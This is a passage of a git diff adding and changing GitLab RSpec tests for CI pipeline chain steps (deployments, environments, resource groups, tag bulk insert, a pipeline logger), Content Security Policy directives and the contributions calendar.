'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::CreateDeployments do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { create(:ci_pipeline, project: project, stages: [stage]) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: 
project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! } + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a deployment job' do + let!(:job) { build(:ci_build, :start_review_app, project: project) } + let!(:environment) { create(:environment, project: project, name: job.expanded_environment_name) } + + it 'creates a deployment record' do + expect { subject }.to change { Deployment.count }.by(1) + + job.reset + expect(job.deployment.project).to eq(job.project) + expect(job.deployment.ref).to eq(job.ref) + expect(job.deployment.sha).to eq(job.sha) + expect(job.deployment.deployable).to eq(job) + expect(job.deployment.deployable_type).to eq('CommitStatus') + expect(job.deployment.environment).to eq(job.persisted_environment) + end + + context 'when creation failure occures' do + before do + allow_next_instance_of(Deployment) do |deployment| + allow(deployment).to receive(:save!) 
{ raise ActiveRecord::RecordInvalid } + end + end + + it 'trackes the exception' do + expect { subject }.to raise_error(described_class::DeploymentCreationError) + + expect(Deployment.count).to eq(0) + end + end + + context 'when the corresponding environment does not exist' do + let!(:environment) { } + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + end + + context 'when a pipeline contains a teardown job' do + let!(:job) { build(:ci_build, :stop_review_app, project: project) } + let!(:environment) { create(:environment, name: job.expanded_environment_name) } + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + + context 'when a pipeline does not contain a deployment job' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any deployments' do + expect { subject }.not_to change { Deployment.count } + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb index d60ecc80a6e..4206483b228 100644 --- a/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb @@ -56,4 +56,74 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Create do .to include /Failed to persist the pipeline/ end end + + context 'tags persistence' do + let(:stage) do + build(:ci_stage_entity, pipeline: pipeline) + end + + let(:job) do + build(:ci_build, stage: stage, pipeline: pipeline, project: project) + end + + let(:bridge) 
do + build(:ci_bridge, stage: stage, pipeline: pipeline, project: project) + end + + before do + pipeline.stages = [stage] + stage.statuses = [job, bridge] + end + + context 'without tags' do + it 'extracts an empty tag list' do + expect(CommitStatus) + .to receive(:bulk_insert_tags!) + .with(stage.statuses, {}) + .and_call_original + + step.perform! + + expect(job.instance_variable_defined?(:@tag_list)).to be_falsey + expect(job).to be_persisted + expect(job.tag_list).to eq([]) + end + end + + context 'with tags' do + before do + job.tag_list = %w[tag1 tag2] + end + + it 'bulk inserts tags' do + expect(CommitStatus) + .to receive(:bulk_insert_tags!) + .with(stage.statuses, { job.name => %w[tag1 tag2] }) + .and_call_original + + step.perform! + + expect(job.instance_variable_defined?(:@tag_list)).to be_falsey + expect(job).to be_persisted + expect(job.tag_list).to match_array(%w[tag1 tag2]) + end + end + + context 'when the feature flag is disabled' do + before do + job.tag_list = %w[tag1 tag2] + stub_feature_flags(ci_bulk_insert_tags: false) + end + + it 'follows the old code path' do + expect(CommitStatus).not_to receive(:bulk_insert_tags!) + + step.perform! 
+ + expect(job.instance_variable_defined?(:@tag_list)).to be_truthy + expect(job).to be_persisted + expect(job.reload.tag_list).to match_array(%w[tag1 tag2]) + end + end + end end diff --git a/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb new file mode 100644 index 00000000000..253928e1a19 --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb @@ -0,0 +1,94 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::EnsureEnvironments do + let(:project) { create(:project) } + let(:user) { create(:user) } + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { build(:ci_pipeline, project: project, stages: [stage]) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! 
} + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a deployment job' do + let!(:job) { build(:ci_build, :start_review_app, project: project) } + + it 'ensures environment existence for the job' do + expect { subject }.to change { Environment.count }.by(1) + + expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + + context 'when an environment has already been existed' do + before do + create(:environment, project: project, name: 'review/master') + end + + it 'ensures environment existence for the job' do + expect { subject }.not_to change { Environment.count } + + expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + end + + context 'when an environment name contains an invalid character' do + let(:pipeline) { build(:ci_pipeline, ref: '!!!', project: project, stages: [stage]) } + + it 'sets the failure status' do + expect { subject }.not_to change { Environment.count } + + expect(job).to be_failed + expect(job).to be_environment_creation_failure + expect(job.persisted_environment).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create any environments' do + expect { subject }.not_to change { Environment.count } + + expect(job.persisted_environment).to be_nil + end + end + end + + context 'when a pipeline contains a teardown job' do + let!(:job) { build(:ci_build, :stop_review_app, project: project) } + + it 'ensures environment existence for the job' do + expect { subject }.to change { Environment.count }.by(1) + + 
expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + end + + context 'when a pipeline does not contain a deployment job' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any environments' do + expect { subject }.not_to change { Environment.count } + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb new file mode 100644 index 00000000000..87df5a3e21b --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb @@ -0,0 +1,85 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::EnsureResourceGroups do + let(:project) { create(:project) } + let(:user) { create(:user) } + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { build(:ci_pipeline, project: project, stages: [stage]) } + let!(:environment) { create(:environment, name: 'production', project: project) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! 
} + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a job that requires a resource group' do + let!(:job) do + build(:ci_build, project: project, environment: 'production', options: { resource_group_key: '$CI_ENVIRONMENT_NAME' }) + end + + it 'ensures the resource group existence' do + expect { subject }.to change { Ci::ResourceGroup.count }.by(1) + + expect(project.resource_groups.find_by_key('production')).to be_present + expect(job.resource_group.key).to eq('production') + expect(job.options[:resource_group_key]).to be_nil + end + + context 'when a resource group has already been existed' do + before do + create(:ci_resource_group, project: project, key: 'production') + end + + it 'ensures the resource group existence' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(project.resource_groups.find_by_key('production')).to be_present + expect(job.resource_group.key).to eq('production') + expect(job.options[:resource_group_key]).to be_nil + end + end + + context 'when a resource group key contains an invalid character' do + let!(:job) do + build(:ci_build, project: project, environment: '!!!', options: { resource_group_key: '$CI_ENVIRONMENT_NAME' }) + end + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(job.resource_group).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(job.resource_group).to be_nil + end + end + end + + context 'when a pipeline does not contain a job that requires a resource group' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + 
end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb index cf21c98dbd5..cebc4c02d11 100644 --- a/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb @@ -24,6 +24,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do second_stage_job_name: stage: second_stage services: + - - postgres before_script: - echo 'first hello' @@ -142,6 +143,23 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do perform! end + + it 'returns expected payload' do + expect(::Gitlab::HTTP).to receive(:post) do |_url, params| + payload = Gitlab::Json.parse(params[:body]) + + builds = payload['builds'] + expect(builds.count).to eq(2) + expect(builds[0]['services']).to be_nil + expect(builds[0]['stage']).to eq('first_stage') + expect(builds[0]['image']).to eq('hello_world') + expect(builds[1]['services']).to eq(['postgres']) + expect(builds[1]['stage']).to eq('second_stage') + expect(builds[1]['image']).to be_nil + end + + perform! 
+ end end context 'when EXTERNAL_VALIDATION_SERVICE_TOKEN is set' do diff --git a/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb b/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb index 115674edc48..3e10ca686ba 100644 --- a/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb @@ -17,30 +17,33 @@ RSpec.describe Gitlab::Ci::Pipeline::Expression::Lexeme::Variable do end describe '#evaluate' do - it 'returns variable value if it is defined' do - variable = described_class.new('VARIABLE') + let(:lexeme) { described_class.new('VARIABLE') } - expect(variable.evaluate(VARIABLE: 'my variable')) + it 'returns variable value if it is defined' do + expect(lexeme.evaluate(VARIABLE: 'my variable')) .to eq 'my variable' end it 'allows to use a string as a variable key too' do - variable = described_class.new('VARIABLE') - - expect(variable.evaluate('VARIABLE' => 'my variable')) + expect(lexeme.evaluate('VARIABLE' => 'my variable')) .to eq 'my variable' end it 'returns nil if it is not defined' do - variable = described_class.new('VARIABLE') - - expect(variable.evaluate(OTHER: 'variable')).to be_nil + expect(lexeme.evaluate('OTHER' => 'variable')).to be_nil + expect(lexeme.evaluate(OTHER: 'variable')).to be_nil end it 'returns an empty string if it is empty' do - variable = described_class.new('VARIABLE') + expect(lexeme.evaluate('VARIABLE' => '')).to eq '' + expect(lexeme.evaluate(VARIABLE: '')).to eq '' + end + + it 'does not call with_indifferent_access unnecessarily' do + variables_hash = { VARIABLE: 'my variable' }.with_indifferent_access - expect(variable.evaluate(VARIABLE: '')).to eq '' + expect(variables_hash).not_to receive(:with_indifferent_access) + expect(lexeme.evaluate(variables_hash)).to eq 'my variable' end end end diff --git a/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb b/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb index 
ec7eebdc056..84713e2a798 100644 --- a/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb @@ -9,6 +9,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Expression::Statement do .append(key: 'PATH_VARIABLE', value: 'a/path/variable/value') .append(key: 'FULL_PATH_VARIABLE', value: '/a/full/path/variable/value') .append(key: 'EMPTY_VARIABLE', value: '') + .to_hash end subject do diff --git a/spec/lib/gitlab/ci/pipeline/logger_spec.rb b/spec/lib/gitlab/ci/pipeline/logger_spec.rb new file mode 100644 index 00000000000..0b44e35dec1 --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/logger_spec.rb @@ -0,0 +1,132 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::Ci::Pipeline::Logger do + let_it_be(:project) { build_stubbed(:project) } + let_it_be(:pipeline) { build_stubbed(:ci_pipeline, project: project) } + + subject(:logger) { described_class.new(project: project) } + + describe '#log_when' do + it 'stores blocks for later evaluation' do + logger.log_when { |obs| true } + + expect(logger.send(:log_conditions).first).to be_a(Proc) + end + end + + describe '#instrument' do + it "returns the block's value" do + expect(logger.instrument(:expensive_operation) { 123 }).to eq(123) + end + + it 'records durations of instrumented operations' do + loggable_data = { + 'expensive_operation_duration_s' => { + 'count' => 1, + 'avg' => a_kind_of(Numeric), + 'max' => a_kind_of(Numeric), + 'min' => a_kind_of(Numeric) + } + } + + logger.instrument(:expensive_operation) { 123 } + expect(logger.observations_hash).to match(a_hash_including(loggable_data)) + end + + it 'raises an error when block is not provided' do + expect { logger.instrument(:expensive_operation) } + .to raise_error(ArgumentError, 'block not given') + end + end + + describe '#observe' do + it 'records durations of observed operations' do + loggable_data = { + 'pipeline_creation_duration_s' => { + 'avg' => 30, 'count' => 1, 'max' 
=> 30, 'min' => 30 + } + } + + expect(logger.observe(:pipeline_creation_duration_s, 30)).to be_truthy + expect(logger.observations_hash).to match(a_hash_including(loggable_data)) + end + end + + describe '#commit' do + subject(:commit) { logger.commit(pipeline: pipeline, caller: 'source') } + + before do + stub_feature_flags(ci_pipeline_creation_logger: flag) + allow(logger).to receive(:current_monotonic_time) { Time.current.to_i } + + logger.instrument(:pipeline_save) { travel(60.seconds) } + logger.observe(:pipeline_creation_duration_s, 30) + logger.observe(:pipeline_creation_duration_s, 10) + end + + context 'when the feature flag is enabled' do + let(:flag) { true } + + let(:loggable_data) do + { + 'class' => described_class.name.to_s, + 'pipeline_id' => pipeline.id, + 'pipeline_persisted' => true, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_creation_caller' => 'source', + 'pipeline_source' => pipeline.source, + 'pipeline_save_duration_s' => { + 'avg' => 60, 'count' => 1, 'max' => 60, 'min' => 60 + }, + 'pipeline_creation_duration_s' => { + 'avg' => 20, 'count' => 2, 'max' => 30, 'min' => 10 + } + } + end + + it 'logs to application.json' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(commit).to be_truthy + end + + context 'with log conditions' do + it 'does not log when the conditions are false' do + logger.log_when { |_obs| false } + + expect(Gitlab::AppJsonLogger).not_to receive(:info) + + expect(commit).to be_falsey + end + + it 'logs when a condition is true' do + logger.log_when { |_obs| true } + logger.log_when { |_obs| false } + + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(commit).to be_truthy + end + end + end + + context 'when the feature flag is disabled' do + let(:flag) { false } + + it 'does not log' do + 
expect(Gitlab::AppJsonLogger).not_to receive(:info) + + expect(commit).to be_falsey + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb b/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb index e2b64e65938..68806fbf287 100644 --- a/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do let(:pipeline) { build(:ci_empty_pipeline, project: project, sha: head_sha) } let(:root_variables) { [] } let(:seed_context) { double(pipeline: pipeline, root_variables: root_variables) } - let(:attributes) { { name: 'rspec', ref: 'master', scheduling_type: :stage } } + let(:attributes) { { name: 'rspec', ref: 'master', scheduling_type: :stage, when: 'on_success' } } let(:previous_stages) { [] } let(:current_stage) { double(seeds_names: [attributes[:name]]) } @@ -61,17 +61,35 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do end end - context 'with job:rules but no explicit when:' do - context 'is matched' do - let(:attributes) { { name: 'rspec', ref: 'master', rules: [{ if: '$VAR == null' }] } } + context 'with job: rules but no explicit when:' do + let(:base_attributes) { { name: 'rspec', ref: 'master' } } + + context 'with a manual job' do + context 'with a matched rule' do + let(:attributes) { base_attributes.merge(when: 'manual', rules: [{ if: '$VAR == null' }]) } + + it { is_expected.to include(when: 'manual') } + end - it { is_expected.to include(when: 'on_success') } + context 'is not matched' do + let(:attributes) { base_attributes.merge(when: 'manual', rules: [{ if: '$VAR != null' }]) } + + it { is_expected.to include(when: 'never') } + end end - context 'is not matched' do - let(:attributes) { { name: 'rspec', ref: 'master', rules: [{ if: '$VAR != null' }] } } + context 'with an automatic job' do + context 'is matched' do + let(:attributes) { base_attributes.merge(when: 'on_success', rules: [{ if: '$VAR == null' }]) } - it { 
is_expected.to include(when: 'never') } + it { is_expected.to include(when: 'on_success') } + end + + context 'is not matched' do + let(:attributes) { base_attributes.merge(when: 'on_success', rules: [{ if: '$VAR != null' }]) } + + it { is_expected.to include(when: 'never') } + end end end @@ -393,6 +411,10 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do describe '#to_resource' do subject { seed_build.to_resource } + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + context 'when job is Ci::Build' do it { is_expected.to be_a(::Ci::Build) } it { is_expected.to be_valid } @@ -443,6 +465,18 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do it_behaves_like 'deployment job' it_behaves_like 'ensures environment existence' + context 'when create_deployment_in_separate_transaction feature flag is enabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: true) + end + + it 'does not create any deployments nor environments' do + expect(subject.deployment).to be_nil + expect(Environment.count).to eq(0) + expect(Deployment.count).to eq(0) + end + end + context 'when the environment name is invalid' do let(:attributes) { { name: 'deploy', ref: 'master', environment: '!!!' 
} } @@ -452,25 +486,6 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do expect(subject.metadata.expanded_environment_name).to be_nil expect(Environment.exists?(name: expected_environment_name)).to eq(false) end - - context 'when surface_environment_creation_failure feature flag is disabled' do - before do - stub_feature_flags(surface_environment_creation_failure: false) - end - - it_behaves_like 'non-deployment job' - it_behaves_like 'ensures environment inexistence' - - it 'tracks an exception' do - expect(Gitlab::ErrorTracking).to receive(:track_exception) - .with(an_instance_of(described_class::EnvironmentCreationFailure), - project_id: project.id, - reason: %q{Name can contain only letters, digits, '-', '_', '/', '$', '{', '}', '.', and spaces, but it cannot start or end with '/'}) - .once - - subject - end - end end end @@ -515,6 +530,18 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do it 'returns a job with resource group' do expect(subject.resource_group).not_to be_nil expect(subject.resource_group.key).to eq('iOS') + expect(Ci::ResourceGroup.count).to eq(1) + end + + context 'when create_deployment_in_separate_transaction feature flag is enabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: true) + end + + it 'does not create any resource groups' do + expect(subject.resource_group).to be_nil + expect(Ci::ResourceGroup.count).to eq(0) + end end context 'when resource group has $CI_ENVIRONMENT_NAME in it' do @@ -892,7 +919,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do context 'using rules:' do using RSpec::Parameterized - let(:attributes) { { name: 'rspec', rules: rule_set } } + let(:attributes) { { name: 'rspec', rules: rule_set, when: 'on_success' } } context 'with a matching if: rule' do context 'with an explicit `when: never`' do diff --git a/spec/lib/gitlab/ci/status/bridge/common_spec.rb b/spec/lib/gitlab/ci/status/bridge/common_spec.rb index 37524afc83d..30e6ad234a0 100644 --- 
a/spec/lib/gitlab/ci/status/bridge/common_spec.rb +++ b/spec/lib/gitlab/ci/status/bridge/common_spec.rb @@ -29,7 +29,15 @@ RSpec.describe Gitlab::Ci::Status::Bridge::Common do end it { expect(subject).to have_details } - it { expect(subject.details_path).to include "pipelines/#{downstream_pipeline.id}" } + it { expect(subject.details_path).to include "jobs/#{bridge.id}" } + + context 'with ci_retry_downstream_pipeline ff disabled' do + before do + stub_feature_flags(ci_retry_downstream_pipeline: false) + end + + it { expect(subject.details_path).to include "pipelines/#{downstream_pipeline.id}" } + end end context 'when user does not have access to read downstream pipeline' do diff --git a/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb b/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb new file mode 100644 index 00000000000..6c1f56de840 --- /dev/null +++ b/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb @@ -0,0 +1,39 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Tags::BulkInsert do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:pipeline) { create(:ci_pipeline, project: project) } + let_it_be_with_refind(:job) { create(:ci_build, :unique_name, pipeline: pipeline, project: project) } + let_it_be_with_refind(:other_job) { create(:ci_build, :unique_name, pipeline: pipeline, project: project) } + let_it_be_with_refind(:bridge) { create(:ci_bridge, pipeline: pipeline, project: project) } + + let(:statuses) { [job, bridge, other_job] } + + subject(:service) { described_class.new(statuses, tags_list) } + + describe '#insert!' 
do + context 'without tags' do + let(:tags_list) { {} } + + it { expect(service.insert!).to be_falsey } + end + + context 'with tags' do + let(:tags_list) do + { + job.name => %w[tag1 tag2], + other_job.name => %w[tag2 tag3 tag4] + } + end + + it 'persists tags' do + expect(service.insert!).to be_truthy + + expect(job.reload.tag_list).to match_array(%w[tag1 tag2]) + expect(other_job.reload.tag_list).to match_array(%w[tag2 tag3 tag4]) + end + end + end +end diff --git a/spec/lib/gitlab/ci/variables/builder_spec.rb b/spec/lib/gitlab/ci/variables/builder_spec.rb index 10275f33484..5ff34592b2f 100644 --- a/spec/lib/gitlab/ci/variables/builder_spec.rb +++ b/spec/lib/gitlab/ci/variables/builder_spec.rb @@ -24,15 +24,5 @@ RSpec.describe Gitlab::Ci::Variables::Builder do expect(names).to include(*keys) end end - - context 'feature flag disabled' do - before do - stub_feature_flags(ci_predefined_vars_in_builder: false) - end - - it 'returns no variables' do - expect(subject.map { |env| env[:key] }).to be_empty - end - end end end diff --git a/spec/lib/gitlab/ci/yaml_processor_spec.rb b/spec/lib/gitlab/ci/yaml_processor_spec.rb index f00a801286d..e8b38b21ef8 100644 --- a/spec/lib/gitlab/ci/yaml_processor_spec.rb +++ b/spec/lib/gitlab/ci/yaml_processor_spec.rb @@ -2139,7 +2139,7 @@ module Gitlab end end - context 'with when/rules conflict' do + context 'with when/rules' do subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute } let(:config) do @@ -2174,7 +2174,7 @@ module Gitlab } end - it_behaves_like 'returns errors', /may not be used with `rules`: when/ + it { is_expected.to be_valid } end context 'used with job-level when:delayed' do @@ -2190,7 +2190,7 @@ module Gitlab } end - it_behaves_like 'returns errors', /may not be used with `rules`: when, start_in/ + it_behaves_like 'returns errors', /may not be used with `rules`: start_in/ end end diff --git a/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb 
b/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb index b0f7703462a..f5f02046d4e 100644 --- a/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb +++ b/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb @@ -97,6 +97,6 @@ RSpec.describe Gitlab::Cleanup::OrphanLfsFileReferences do def stub_lfs_pointers(repo, *oids) expect(repo.gitaly_blob_client) .to receive(:get_all_lfs_pointers) - .and_return(oids.map { |oid| OpenStruct.new(lfs_oid: oid) }) + .and_return(oids.map { |oid| double('pointers', lfs_oid: oid) }) end end diff --git a/spec/lib/gitlab/config/entry/undefined_spec.rb b/spec/lib/gitlab/config/entry/undefined_spec.rb index 36faabd8e31..31e0f9487aa 100644 --- a/spec/lib/gitlab/config/entry/undefined_spec.rb +++ b/spec/lib/gitlab/config/entry/undefined_spec.rb @@ -40,4 +40,10 @@ RSpec.describe Gitlab::Config::Entry::Undefined do expect(entry.specified?).to eq false end end + + describe '#type' do + it 'returns nil' do + expect(entry.type).to eq nil + end + end end diff --git a/spec/lib/gitlab/content_security_policy/config_loader_spec.rb b/spec/lib/gitlab/content_security_policy/config_loader_spec.rb index c0476d38380..56e3fc269e6 100644 --- a/spec/lib/gitlab/content_security_policy/config_loader_spec.rb +++ b/spec/lib/gitlab/content_security_policy/config_loader_spec.rb @@ -85,7 +85,7 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do expect(directives['style_src']).to eq("'self' 'unsafe-inline' https://cdn.example.com") expect(directives['font_src']).to eq("'self' https://cdn.example.com") expect(directives['worker_src']).to eq('http://localhost/assets/ blob: data: https://cdn.example.com') - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " https://cdn.example.com http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " 
https://cdn.example.com http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end @@ -113,7 +113,7 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end it 'does not add CUSTOMER_PORTAL_URL to CSP' do - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end @@ -123,12 +123,12 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end it 'adds CUSTOMER_PORTAL_URL to CSP' do - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/rails/letter_opener/ https://customers.example.com http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/rails/letter_opener/ https://customers.example.com http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end end - context 'letter_opener applicaiton URL' do + context 'letter_opener application URL' do let(:gitlab_url) { 'http://gitlab.example.com' } let(:letter_opener_url) { "#{gitlab_url}/rails/letter_opener/" } @@ -156,6 +156,46 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end end end + + context 'Snowplow Micro event collector' do + let(:snowplow_micro_hostname) { 'localhost:9090' } + let(:snowplow_micro_url) { "http://#{snowplow_micro_hostname}/" } + + before do + stub_env('SNOWPLOW_MICRO_ENABLE', 1) + allow(Gitlab::Tracking).to receive(:collector_hostname).and_return(snowplow_micro_hostname) + end + + context 'when in production' do + before do 
+ stub_rails_env('production') + end + + it 'does not add Snowplow Micro URL to connect-src' do + expect(directives['connect_src']).not_to include(snowplow_micro_url) + end + end + + context 'when in development' do + before do + stub_rails_env('development') + end + + it 'adds Snowplow Micro URL with trailing slash to connect-src' do + expect(directives['connect_src']).to match(Regexp.new(snowplow_micro_url)) + end + + context 'when not enabled using ENV[SNOWPLOW_MICRO_ENABLE]' do + before do + stub_env('SNOWPLOW_MICRO_ENABLE', nil) + end + + it 'does not add Snowplow Micro URL to connect-src' do + expect(directives['connect_src']).not_to include(snowplow_micro_url) + end + end + end + end end describe '#load' do diff --git a/spec/lib/gitlab/contributions_calendar_spec.rb b/spec/lib/gitlab/contributions_calendar_spec.rb index 384609c6664..8a9ab736d46 100644 --- a/spec/lib/gitlab/contributions_calendar_spec.rb +++ b/spec/lib/gitlab/contributions_calendar_spec.rb @@ -50,7 +50,8 @@ RSpec.describe Gitlab::ContributionsCalendar do Event.create!( project: project, action: action, - target: @targets[project], + target_type: @targets[project].class.name, + target_id: @targets[project].id, author: contributor, created_at: DateTime.new(day.year, day.month, day.day, hour) ) @@ -66,14 +67,34 @@ RSpec.describe Gitlab::ContributionsCalendar do end context "when the user has opted-in for private contributions" do + before do + contributor.update_column(:include_private_contributions, true) + end + it "shows private and public events to all users" do - user.update_column(:include_private_contributions, true) create_event(private_project, today) create_event(public_project, today) + expect(calendar.activity_dates[today]).to eq(2) + expect(calendar(user).activity_dates[today]).to eq(2) + expect(calendar(contributor).activity_dates[today]).to eq(2) + end + + # tests for bug https://gitlab.com/gitlab-org/gitlab/-/merge_requests/74826 + it "still counts correct with feature access 
levels set to private" do + create_event(private_project, today) + + private_project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PRIVATE) + private_project.project_feature.update_attribute(:repository_access_level, ProjectFeature::PRIVATE) + private_project.project_feature.update_attribute(:merge_requests_access_level, ProjectFeature::PRIVATE) + expect(calendar.activity_dates[today]).to eq(1) expect(calendar(user).activity_dates[today]).to eq(1) - expect(calendar(contributor).activity_dates[today]).to eq(2) + expect(calendar(contributor).activity_dates[today]).to eq(1) + end + + it "does not fail if there are no contributed projects" do + expect(calendar.activity_dates[today]).to eq(nil) end end @@ -125,6 +146,7 @@ RSpec.describe Gitlab::ContributionsCalendar do create_event(public_project, today, 10) create_event(public_project, today, 16) create_event(public_project, today, 23) + create_event(public_project, tomorrow, 1) end it "renders correct event counts within the UTC timezone" do @@ -137,14 +159,14 @@ RSpec.describe Gitlab::ContributionsCalendar do it "renders correct event counts within the Sydney timezone" do Time.use_zone('UTC') do contributor.timezone = 